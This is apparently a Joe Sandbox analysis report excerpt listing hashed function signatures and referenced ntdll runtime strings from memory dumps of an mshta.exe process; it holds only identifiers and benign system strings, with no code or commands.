• Opcode ID: 4ea41fbc9c1cb3b5254c71cbdaf2432aa16b4c46cb70638361d44dc0addc8961
• Instruction ID: 37242f0722e3744c864473ff74a38832cb0cb1e7bbe945fccc90e600706a94a1
• Opcode Fuzzy Hash: 4ea41fbc9c1cb3b5254c71cbdaf2432aa16b4c46cb70638361d44dc0addc8961
• Instruction Fuzzy Hash: 5A9150F04082988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95

Memory Dump Source
• Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
Similarity
• API ID:
• String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
• API String ID: 0-3558027158
• Opcode ID: 63ad2c9632a21fdda7d00ffeadc1703e7af064eff9224086e85292dfcef52d2f
• Instruction ID: a7fc193aa4e6179ba3cb7b9507727eeb4118a796a2e869f2d7cd621d1c7f72c9
• Opcode Fuzzy Hash: 63ad2c9632a21fdda7d00ffeadc1703e7af064eff9224086e85292dfcef52d2f
• Instruction Fuzzy Hash: A39150F04082988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95

Memory Dump Source
• Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
• Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: a7a22f6988f16339f1189cc0f82143a28ee15d65f12557588959887d1fe5394c
• Instruction ID: 24c27cf493f214201c56f7b0025a990b34b04429565d8132efd7d19226c9152f
• Opcode Fuzzy Hash: a7a22f6988f16339f1189cc0f82143a28ee15d65f12557588959887d1fe5394c
• Instruction Fuzzy Hash: E151F8B5A00216BFCF20EF9CC98097EF7BCBB892407148969E4A5D7641D374DE50CBA0

Memory Dump Source
• Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
• Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: fde66457722a4674c4c0e7ac87ae46cfa0f19257d5a4bb8a534a79ff1f04cc6d
• Instruction ID: 831a35b59b27a6e457f3a5ac304d07de72dfb2a747fd914ebd8c77e16fdd856e
• Opcode Fuzzy Hash: fde66457722a4674c4c0e7ac87ae46cfa0f19257d5a4bb8a534a79ff1f04cc6d
• Instruction Fuzzy Hash: C751F8B9A04A45AFDB30DF5CC890A7FB7FDEB84240B048C5AE6E6D7641D7B4DA408760

Strings
• ExecuteOptions, xrefs: 039B46A0
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039B46FC
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 039B4655
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 039B4742
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 039B4725
• Execute=1, xrefs: 039B4713
• CLIENT(ntdll): Processing section info %ws..., xrefs: 039B4787
Memory Dump Source
• Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
• Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: b4898cc7e67fe0ceec7cf96ff8c88c27aa708957d4cbee2c8d28d1cdd815a8c7
• Instruction ID: 133923bf0c3b51bd56d143234749a4a2194d53bc93dc4f2dcc030d1087823bed
• Opcode Fuzzy Hash: b4898cc7e67fe0ceec7cf96ff8c88c27aa708957d4cbee2c8d28d1cdd815a8c7
• Instruction Fuzzy Hash: A251D335A00219AADF20FBA99C85BFEB7BCAB84344F0404A9E505AB1D1E771AA45CF51

Memory Dump Source
• Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
• Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction ID: afdfd22c993b5553d789ce02d60d0b9ad8c15b0891fabb4995c239a2e6a67eae
• Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction Fuzzy Hash: 48021375608341AFC305DF18C994A6BBBF5EFC8710F048A2EF9899B264DB31E915CB52

Memory Dump Source
• Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
• Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: 793f19682b52fd82806e68514202ff921f4f14b25398c97a1b167a2862d80313
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: AC81BE70E052499EDF24FF68C8917FEBBAAAFC53A0F1C465AD861A7790C73498408B54
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                                    • Opcode ID: 6fd24441c4ec98e6d23aa3eda6978eeb62919394d722b8f86006d37914f07070
                                                                                                                                    • Instruction ID: 5b843957b5e4ccf5179f5539a3727b164c0d0f171d08ca82dfdecdff580e8df4
                                                                                                                                    • Opcode Fuzzy Hash: 6fd24441c4ec98e6d23aa3eda6978eeb62919394d722b8f86006d37914f07070
                                                                                                                                    • Instruction Fuzzy Hash: 7E21517AE00219AFDB10EF69CC40AEFB7ECEF84684F480516EA55E7200E730D9018BA5
                                                                                                                                    Strings
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039B02E7
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039B02BD
                                                                                                                                    • RTL: Re-Waiting, xrefs: 039B031E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: 680c6809cc86ab02f2a3829b9c7eb896150e21a000e073c5b63949db64ca2b53
                                                                                                                                    • Instruction ID: 505d5ef6c33544097daac071abc48dc4fdd1906154bddcd2948dbf62379fd972
                                                                                                                                    • Opcode Fuzzy Hash: 680c6809cc86ab02f2a3829b9c7eb896150e21a000e073c5b63949db64ca2b53
                                                                                                                                    • Instruction Fuzzy Hash: ECE1DB316097419FD724CF28D984B6AB7E8BF88364F180A6DF4A68B3E1D774D844CB52
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 039B7BAC
                                                                                                                                    • RTL: Resource at %p, xrefs: 039B7B8E
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 039B7B7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: ea43716332290993c400d0bb3c3c4eea1656f02cc7f5685cc803559bc15da650
                                                                                                                                    • Instruction ID: d4bf2ed96f83dba7255e566cf91b5d494ea44212a9f0bef88c0ea1339539f44a
                                                                                                                                    • Opcode Fuzzy Hash: ea43716332290993c400d0bb3c3c4eea1656f02cc7f5685cc803559bc15da650
                                                                                                                                    • Instruction Fuzzy Hash: BE41E2357047069FD724EE69C940B6AB7E9EFC9B10F040A1DF95ADB280DB31E5068B91
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039B728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 039B7294
                                                                                                                                    • RTL: Re-Waiting, xrefs: 039B72C1
                                                                                                                                    • RTL: Resource at %p, xrefs: 039B72A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: 877f82be05b262b762b54931452d36537f9a6e84b9ae77c140f6faa25a784a32
                                                                                                                                    • Instruction ID: a847aab55fe667a0089926083752de295fa9e8d4c89a763708dea461b16fecb9
                                                                                                                                    • Opcode Fuzzy Hash: 877f82be05b262b762b54931452d36537f9a6e84b9ae77c140f6faa25a784a32
                                                                                                                                    • Instruction Fuzzy Hash: 3F41EE36704206ABC720DE64CD41BAAB7B9FFC4750F180A19F995AB280DB31E8528BD1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                    • Opcode ID: e4777d2dfbcfd41145e8a520e2e3f660e7f520972c6880aa1df840c4ed82728f
                                                                                                                                    • Instruction ID: ddc3e43296e9fd4393b57751781bc86f8658166a8c0e8f89c9c30aaaa6659874
                                                                                                                                    • Opcode Fuzzy Hash: e4777d2dfbcfd41145e8a520e2e3f660e7f520972c6880aa1df840c4ed82728f
                                                                                                                                    • Instruction Fuzzy Hash: E4318CBAA006199FDB20DF29CC40BEEB7FCEF44650F444956E989D7240EB70DA458F61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -dh*$.$)<$/2!8$:$dh,-
                                                                                                                                    • API String ID: 0-563082556
                                                                                                                                    • Opcode ID: 38d7908bec288636ef3d4a6826e577896e00bbf20f53884bf03314314af016f5
                                                                                                                                    • Instruction ID: 68b3d217e3ceabb2ff9b301c856780102571830f3b8ca2d19f40b2751196955a
                                                                                                                                    • Opcode Fuzzy Hash: 38d7908bec288636ef3d4a6826e577896e00bbf20f53884bf03314314af016f5
                                                                                                                                    • Instruction Fuzzy Hash: E9F0B4700087848BCB09AF14D4595AABBE1FF99309F50676DD48ADB261DB38D609CB06
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: c3806e7089d35c7a052d116ad379b9664afd4f8f3dd15b3498c2d8c52306434e
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: 0591A871E002169BDF24EF9AC8816BEB7A9FFC43A0F78451AE865E72D0D7309940C760
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: 1a8d103ae473d846ff6d3970c010e2088e829f02ac493d215846c74e716ed744
                                                                                                                                    • Instruction ID: e554599e349c2088e6ec4af9db6b17e9ae2697c2564461be1f3b406d58f881c7
                                                                                                                                    • Opcode Fuzzy Hash: 1a8d103ae473d846ff6d3970c010e2088e829f02ac493d215846c74e716ed744
                                                                                                                                    • Instruction Fuzzy Hash: E4812975D012699BDB31DB54CC44BEEB7B8AF48750F0446EAE919B7240D7309E85CFA0